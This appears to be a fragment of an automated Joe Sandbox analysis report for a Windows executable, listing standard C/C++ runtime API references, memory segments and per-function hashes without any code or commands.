                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 2133458128-1810561636
                                                                                                                                                                                                                      • Opcode ID: e14aaeb9c33c7f373905e459f7465f787291077ca2190e5816e3bbb181c7ceec
                                                                                                                                                                                                                      • Instruction ID: bcc8d504a2bf30c8d24eecd9a88c518ff9e969a7e39a2117369ded2ce1e171ee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e14aaeb9c33c7f373905e459f7465f787291077ca2190e5816e3bbb181c7ceec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E11A271910A25DBCB50EF64D8466EDB7F7EF84320F58040DE402AB391DF719A818B95

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00613C85
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00613C8F
                                                                                                                                                                                                                      • int.LIBCPMT ref: 00613CA6
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::_Lockit.LIBCPMT ref: 006116BB
                                                                                                                                                                                                                        • Part of subcall function 006116AA: std::_Lockit::~_Lockit.LIBCPMT ref: 006116D5
                                                                                                                                                                                                                      • codecvt.LIBCPMT ref: 00613CC9
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00613CE0
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00613D00
                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00613D0D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 2133458128-1810561636
                                                                                                                                                                                                                      • Opcode ID: 765a1162f65bd4565b9c80512c2ff2e40bcd863909c55a726d1b15a78a8a71d3
                                                                                                                                                                                                                      • Instruction ID: 9329d72a433e8cf42a1748dde22d99e523c879bc6337ac38aa6afdd40d99943f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 765a1162f65bd4565b9c80512c2ff2e40bcd863909c55a726d1b15a78a8a71d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB019E729041259BDB45EF64D81A6ED7BB7AF84710F2C000DF812AB391DF319F828B95

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0061A567
                                                                                                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 0061A675
                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 0061A7C7
                                                                                                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0061A7E2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                      • API String ID: 2751267872-393685449
                                                                                                                                                                                                                      • Opcode ID: 5cc5af9d837c47a238ce316e2ad5ed6c75675787d498417c24dbc14dd81afc81
                                                                                                                                                                                                                      • Instruction ID: 41aba0480bbdc6aa0c92c3eae2cc2334898af1f28b145bad7a2944b1da6e31d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cc5af9d837c47a238ce316e2ad5ed6c75675787d498417c24dbc14dd81afc81
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6B17A75802209EFCF15DFE4C8819EEBBB6FF08310F18455AE8146B256D731DA91CBA6

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 0-3907804496
                                                                                                                                                                                                                      • Opcode ID: 8e6952089c77fa8bce461f7b15e8e5c47f7c3ea1207f4dad61d90ea3f8986675
                                                                                                                                                                                                                      • Instruction ID: 3c42d906f79685b838bd102fad14c55efcdf827e820157289498a84d6716655d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e6952089c77fa8bce461f7b15e8e5c47f7c3ea1207f4dad61d90ea3f8986675
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68B1D170E04A699FDB11DF99E880BEE7BF7AF49300F144159E4119B392CB749982CFA1

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • UnDecorator::getArgumentList.LIBCMT ref: 00657841
                                                                                                                                                                                                                        • Part of subcall function 006573DC: Replicator::operator[].LIBCMT ref: 0065745F
                                                                                                                                                                                                                        • Part of subcall function 006573DC: DName::operator+=.LIBCMT ref: 00657467
                                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 0065789A
                                                                                                                                                                                                                      • DName::DName.LIBCMT ref: 006578F2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                                                      • String ID: (;C$4;C$8;C$D;C
                                                                                                                                                                                                                      • API String ID: 834187326-2621726175
                                                                                                                                                                                                                      • Opcode ID: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
                                                                                                                                                                                                                      • Instruction ID: d6b2b5b3d6f026d62cfc1dee8d0084e09adb7c1d809fc0f7786834ef7afe1a24
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55216030A05208AFDB15DF1CE4449A97BF5EF0534BF0480A9EC46CB362EB30EA46CB48

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00616B1C
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00616B48
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00616B87
                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00616BA4
                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00616BE3
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00616C00
                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00616C42
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00616C65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2040435927-0
                                                                                                                                                                                                                      • Opcode ID: 2b30d59da6d13db6a0384726a40835c5c69d36b28db5adaa1f64184a16068454
                                                                                                                                                                                                                      • Instruction ID: ad49c7e18045c5510c50865211b4118c8e1a295bdd2c58de90910171fe2ee049
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b30d59da6d13db6a0384726a40835c5c69d36b28db5adaa1f64184a16068454
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59519F7690020AABDB205FA0CC45FEA7BBBEB44740F184429F914EA260DB719D919BA0

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00621D18,?,?,00000000,00000000,?,?,00621EC6,00000021,FlsSetValue,006313A8,006313B0,00000000), ref: 00621CCC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                                                                                                                      • Opcode ID: 6bcdf34ae9433e335600c944ea7c886358ce446660ff629db2e061d67ceaba13
                                                                                                                                                                                                                      • Instruction ID: b88b9d6627f822ee77d512cb34150e3b86b684a968d62e642baa2173ebd0c534
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bcdf34ae9433e335600c944ea7c886358ce446660ff629db2e061d67ceaba13
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED21F639B85A34ABC7219F61FC41AAA375B9B63764F140120E905AF390D675ED02CED0

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • UnDecorator::UScore.LIBCMT ref: 006591BF
                                                                                                                                                                                                                      • DName::DName.LIBCMT ref: 006591CB
                                                                                                                                                                                                                        • Part of subcall function 00656E96: DName::doPchar.LIBCMT ref: 00656EC7
                                                                                                                                                                                                                      • UnDecorator::getScopedName.LIBCMT ref: 0065920A
                                                                                                                                                                                                                      • DName::operator+=.LIBCMT ref: 00659214
                                                                                                                                                                                                                      • DName::operator+=.LIBCMT ref: 00659223
                                                                                                                                                                                                                      • DName::operator+=.LIBCMT ref: 0065922F
                                                                                                                                                                                                                      • DName::operator+=.LIBCMT ref: 0065923C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1480779885-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 882 61512a-61514c call 6171f3 call 613a1a 887 615190-615194 882->887 888 61514e-61518a call 61528d call 6152b0 call 615082 882->888 889 6151a7-6151b6 call 613a72 call 6171d0 887->889 890 615196-6151a3 887->890 888->887 890->889
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00615131
                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0061513C
                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 006151AA
                                                                                                                                                                                                                        • Part of subcall function 0061528D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006152A5
                                                                                                                                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 00615157
                                                                                                                                                                                                                      • _Yarn.LIBCPMT ref: 0061516D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 1088826258-1810561636

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 904 61eebe-61eefb GetModuleHandleExW 905 61eefd-61ef0f GetProcAddress 904->905 906 61ef1e-61ef22 904->906 905->906 907 61ef11-61ef1c 905->907 908 61ef24-61ef27 FreeLibrary 906->908 909 61ef2d-61ef3a 906->909 907->906 908->909
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,4E0C77D7,?,?,00000000,0062D586,000000FF,?,0061EE4E,?,?,0061EE22,00000016), ref: 0061EEF3
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0061EF05
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,0062D586,000000FF,?,0061EE4E,?,?,0061EE22,00000016), ref: 0061EF27
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                      • String ID: #Da$CorExitProcess$mscoree.dll
                                                                                                                                                                                                                      • API String ID: 4061214504-3766507106
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4267394785-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4267394785-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4267394785-0
                                                                                                                                                                                                                      • Opcode ID: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
                                                                                                                                                                                                                      • Instruction ID: 2f3174b6460024395a64a48f72e5d6295df67857de25ab22e7a2358828d9e838
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE219276E081079ACB34CEA8D9999ED7BB29F04303F54516AA801D7A4AD7319A498610
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4267394785-0
                                                                                                                                                                                                                      • Opcode ID: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
                                                                                                                                                                                                                      • Instruction ID: 8f56352188cd664dea6cfba31b8e725395449245a2a579d79640e84ecb3fda7d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F21C376E0810B9ACF38CEB8D9999FD7BF29F04303F58516AAC01D7A4AD7309B498710
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0061A0D1,006182EB,006179A2), ref: 0061A0E8
                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0061A0F6
                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0061A10F
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,0061A0D1,006182EB,006179A2), ref: 0061A161
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                      • Opcode ID: 5dddc541cb11e66060535fa4ded1e0e263f2744cdbd4577bbbbb53facd491007
                                                                                                                                                                                                                      • Instruction ID: ad1388923d665d5b074e3b694dbca2c79a4bd76d616dda35679a5334fa22f6dc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dddc541cb11e66060535fa4ded1e0e263f2744cdbd4577bbbbb53facd491007
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8701283220E7516DE72516F47C877EA2667EB01374B28522DF420822E1EF524C865196
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __lock_free$___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1181530324-0
                                                                                                                                                                                                                      • Opcode ID: 4511dd32679ad0c4380a56cd15437f1e7d465bfd809d09fc7d2e8514abba8716
                                                                                                                                                                                                                      • Instruction ID: f396677d863b3ebc012d48f4037fb526e97cbcf3f9b670916718dd233ed886ac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4511dd32679ad0c4380a56cd15437f1e7d465bfd809d09fc7d2e8514abba8716
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D611C231501704BADB70AF64A40F75E73EA9F00713F20892EFC95972E2DF74DA888A59
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
